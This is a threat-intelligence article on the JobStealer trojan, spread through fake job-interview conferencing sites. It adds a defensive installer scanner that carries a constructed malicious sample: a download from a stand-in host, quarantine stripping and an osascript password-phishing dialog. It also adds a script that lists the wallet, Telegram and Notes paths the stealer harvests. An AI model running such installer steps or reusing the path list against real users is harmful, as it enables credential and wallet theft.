Figure: an example of a website for a fake online conferencing service from which JobStealer is downloaded
The job market is tough enough without a scheduled interview turning into a devastating cyber heist. According to new threat intelligence, a sophisticated cybercriminal campaign is leveraging the anxiety and hope of job seekers to deploy a vicious data-stealing trojan.
Doctor Web’s experts warned users about the spread of JobStealer, a trojan app that steals confidential information from macOS and Windows computer users.
This is not a traditional phishing attack relying on fake invoices; it is a highly targeted social engineering operation that exploits professional trust.
The scam is meticulously crafted to lower a victim’s defenses. The attack begins with the threat actors contacting potential victims and offering them a particular job vacancy. Once the victim agrees to an interview, the attackers instruct them to download a specific video conferencing application to facilitate the call.
They invite users to a job interview and provide them with links to websites for the online meeting ‘platforms’, supposedly so the candidate can connect to a video conference. In reality, these sleek, professional-looking sites are elaborate traps. “In reality, this software is the JobStealer trojan”.
To mask their tracks, the attackers frequently rebrand their malicious payloads. “Our specialists identified variants called MeetLab, Juseo, Meetix, Carolla, and others”. They even go so far as to build fake corporate footprints. To convince users that these platforms are fully functional, scammers create corresponding Telegram channels and social media accounts, for example on X.
When a macOS user goes to download the software, the site steers them away from a normal application install and toward running code by hand. To install the app on devices running macOS, visitors to malicious websites are provided with two options: copy the bash command listed on the website and run it in the Terminal, or download a disk image file in the .dmg format and open it.
If the victim chooses the disk image, they are met with deceptive instructions. The mounted image tells the user to drag a provided script directly into their Terminal window, which pastes the script’s path so that pressing Enter executes it. “In fact, instead of the video conferencing app getting installed, the script will launch the trojan file”.
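Both install paths above end with the victim running a shell script they have not read. A practical defence is to save the command or the dragged script to a file and triage it before executing anything. The following is an added example written for this article, not code from Doctor Web or from the campaign: a small heuristic scanner for the red flags a legitimate meeting-client installer has no reason to contain. The indicator patterns and the sample installer are this example’s own assumptions (the sample is constructed, uses a reserved .invalid domain, and is not a JobStealer artifact).

```python
import re

# Heuristic red flags for a "paste this into Terminal" installer. These are the
# author's assumptions for this example, not indicators published for JobStealer.
INDICATORS = {
    # curl/wget output piped straight into a shell: the real payload is never on disk
    "pipe-to-shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b", re.I),
    # a downloaded file written into a temp directory before anything else happens
    "staged-in-tmp": re.compile(r"(>|-o|--output)\s*[\"']?(/tmp|/var/tmp|/private/tmp|\$TMPDIR)/", re.I),
    # making a freshly written file executable
    "exec-bit": re.compile(r"\bchmod\s+(\+x|[0-7]?[1357][0-7]{2})\b", re.I),
    # stripping or clearing the com.apple.quarantine attribute (xattr -d ... / xattr -c / -rc)
    "quarantine-removal": re.compile(r"\bxattr\b.*(com\.apple\.quarantine|\s-r?c\b)", re.I),
    # decoding an embedded payload instead of downloading a signed package
    "embedded-payload": re.compile(r"\bbase64\s+(-d|-D|--decode)\b", re.I),
    # an AppleScript dialog that asks for a hidden (password) answer
    "applescript-password-prompt": re.compile(r"\bosascript\b.*display dialog.*hidden answer", re.I),
    # dropping a launch agent/daemon so the "installer" survives a reboot
    "persistence": re.compile(r"LaunchAgents|LaunchDaemons|launchctl\s+(load|bootstrap)\b", re.I),
}


def triage_script(text):
    """Return {indicator: [\"lineno: line\", ...]} for every heuristic that fires.

    Comment lines are skipped; an attacker can of course hide a command behind a
    line continuation, so a clean result is a reason to read the script, not to run it.
    """
    hits = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(f"{lineno}: {line}")
    return hits


def verdict(hits):
    """Human-readable summary of a triage result."""
    if not hits:
        return "no heuristic hits (still read it by hand before running)"
    return "suspicious: " + ", ".join(sorted(hits))


# Constructed sample modelled on the shape of a "paste into Terminal" installer.
# The host name is a reserved .invalid name, not a real indicator of compromise.
SAMPLE_INSTALLER = r'''#!/bin/bash
# "Meeting client" one-line installer (constructed for this example)
set -e
curl -fsSL "https://meet.example.invalid/setup" -o /tmp/.meet_setup
xattr -c /tmp/.meet_setup
chmod +x /tmp/.meet_setup
PW=$(osascript -e 'display dialog "Installer needs your password to finish setup" default answer "" with hidden answer' -e 'text returned of result')
echo "$PW" | /tmp/.meet_setup
'''

if __name__ == "__main__":
    result = triage_script(SAMPLE_INSTALLER)
    print(verdict(result))
    for name, lines in result.items():
        for line in lines:
            print(f"  [{name}] {line}")
```

Running the scanner over the constructed sample flags the temp-directory staging, the quarantine removal, the executable bit and the hidden-answer password dialog; a plain `xcode-select --install` or `brew install` line produces no hits. Treat the output as a reading aid, not a verdict.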
Once the trojan executes, it relies on a classic phishing technique to obtain the one thing it cannot take by itself: the user’s password. When launched, Mac.PWS.JobStealer.1 displays a phishing window that alerts users about an alleged error in the app’s operation. To ‘fix’ this error, the malicious program asks users to provide their user account password.
While it collects system information and passwords, JobStealer has a very specific primary objective. “It primarily aims to hijack data from crypto wallets”.
Once armed with the user’s password, the malware harvests the valuable data on the machine, specifically targeting:
- data from about 300 crypto wallet browser extensions installed in target browsers based on Chromium (Chrome, Opera, Brave, OperaGX, Vivaldi, Edge, Arc, and CocCoc).
- Telegram messenger files… where session authorization keys, downloaded files, etc., are stored.
- user notes from the native macOS Notes application.
- evidence that the crypto wallets Ledger Live and Trezor Suite are present in the system.
All of this harvested data is rapidly compressed into a ZIP archive and exfiltrated to the attacker’s Command and Control (C2) server.
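The list above doubles as a checklist of what an infected machine would lose. As an added example for this article (not Doctor Web’s tooling and not derived from the trojan’s code), the script below walks a user profile the way the stealer does and reports the exposure: which Chromium-based browsers hold known wallet extensions, whether Telegram session data and the Notes database are present, and whether Ledger Live or Trezor Suite is installed. The profile paths are the author’s assumptions about where these browsers store data on current macOS builds; verify them on your own machine. Only two wallet extension IDs are included (MetaMask and Phantom, as published in their Chrome Web Store URLs); the campaign’s own list of roughly 300 is not on the page, so extend the table from your own inventory. The directory tree it runs on is constructed inline so the example works offline.

```python
from pathlib import Path
import tempfile

# Chromium profile roots on macOS, relative to the user's home directory.
# Assumptions of this example, not data from the report. Opera keeps its profile
# directly in the listed directory; the others use per-profile subdirectories
# such as "Default" and "Profile 1".
CHROMIUM_PROFILE_ROOTS = {
    "Chrome":  "Library/Application Support/Google/Chrome",
    "Brave":   "Library/Application Support/BraveSoftware/Brave-Browser",
    "Edge":    "Library/Application Support/Microsoft Edge",
    "Vivaldi": "Library/Application Support/Vivaldi",
    "Arc":     "Library/Application Support/Arc/User Data",
    "CocCoc":  "Library/Application Support/CocCoc/Browser",
    "Opera":   "Library/Application Support/com.operasoftware.Opera",
    "OperaGX": "Library/Application Support/com.operasoftware.OperaGX",
}

# Two well-known wallet extensions by Chrome Web Store ID. Extend from your own
# inventory; the campaign's ~300-entry list is not published on the page.
WALLET_EXTENSION_IDS = {
    "nkbihfbeogaeaoehlefnkodbefgpgknn": "MetaMask",
    "bfnaelmomeimhlpmgjnjophhpkkoljpa": "Phantom",
}

# Other artifacts the report names, at their assumed macOS locations.
OTHER_ARTIFACTS = {
    "Telegram Desktop session data": "Library/Application Support/Telegram Desktop/tdata",
    "Apple Notes database": "Library/Group Containers/group.com.apple.notes/NoteStore.sqlite",
}

# Desktop wallet apps whose mere presence the stealer records (bundle names under /Applications).
WALLET_APP_BUNDLES = {"Ledger Live": "Ledger Live.app", "Trezor Suite": "Trezor Suite.app"}


def _looks_like_extension_id(name):
    # Chromium extension IDs are 32 characters drawn from a-p.
    return len(name) == 32 and set(name) <= set("abcdefghijklmnop")


def iter_extension_ids(profile_root):
    """Yield (profile_name, extension_id) for every extension directory under a
    Chromium profile root, handling both the per-profile and Opera's flat layout."""
    if not profile_root.is_dir():
        return
    for profile in [profile_root] + [p for p in profile_root.iterdir() if p.is_dir()]:
        ext_dir = profile / "Extensions"
        if not ext_dir.is_dir():
            continue
        for entry in ext_dir.iterdir():
            if entry.is_dir() and _looks_like_extension_id(entry.name):
                yield profile.name, entry.name


def assess(home, applications):
    """Report what a JobStealer-style collector would find under `home` and `applications`."""
    report = {"wallet_extensions": [], "unknown_extensions": 0, "artifacts": [], "wallet_apps": []}
    for browser, rel in CHROMIUM_PROFILE_ROOTS.items():
        for profile, ext_id in iter_extension_ids(home / rel):
            if ext_id in WALLET_EXTENSION_IDS:
                report["wallet_extensions"].append((browser, profile, WALLET_EXTENSION_IDS[ext_id]))
            else:
                report["unknown_extensions"] += 1
    for label, rel in OTHER_ARTIFACTS.items():
        if (home / rel).exists():
            report["artifacts"].append(label)
    for label, bundle in WALLET_APP_BUNDLES.items():
        if (applications / bundle).is_dir():
            report["wallet_apps"].append(label)
    return report


def build_fixture():
    """Constructed directory tree standing in for a victim's home and /Applications."""
    root = Path(tempfile.mkdtemp(prefix="jobstealer-exposure-"))
    home, apps = root / "home", root / "Applications"
    chrome = home / CHROMIUM_PROFILE_ROOTS["Chrome"] / "Default" / "Extensions"
    (chrome / "nkbihfbeogaeaoehlefnkodbefgpgknn" / "12.0.0_0").mkdir(parents=True)  # MetaMask
    (chrome / "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa").mkdir(parents=True)                # some non-wallet extension
    (home / CHROMIUM_PROFILE_ROOTS["Opera"] / "Extensions" / "bfnaelmomeimhlpmgjnjophhpkkoljpa").mkdir(parents=True)
    (home / OTHER_ARTIFACTS["Telegram Desktop session data"]).mkdir(parents=True)
    (apps / "Ledger Live.app" / "Contents").mkdir(parents=True)
    return home, apps


if __name__ == "__main__":
    home, apps = build_fixture()
    for key, value in assess(home, apps).items():
        print(f"{key}: {value}")
```

To run it against a real machine, call `assess(Path.home(), Path("/Applications"))` instead of the fixture. Anything listed under `wallet_extensions`, `artifacts` or `wallet_apps` is data that the stealer’s ZIP archive would have carried to the C2 server, so those are the credentials and sessions to rotate first after a suspected infection.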
While the macOS variant is highly active, Windows users are not safe. The malware’s creators have also prepared a version of JobStealer for computers running the Windows operating system.
More alarmingly, the infrastructure for a massive cross-platform expansion is already visible. The malicious download sites feature sections for Linux, iOS, and Android applications. While these links currently inform users the apps are “in development” or redirect to the Windows variant, Doctor Web’s analysts issued a warning: “At the same time, it cannot be ruled out that the attackers will begin distributing variants of this trojan for those platforms in the future”.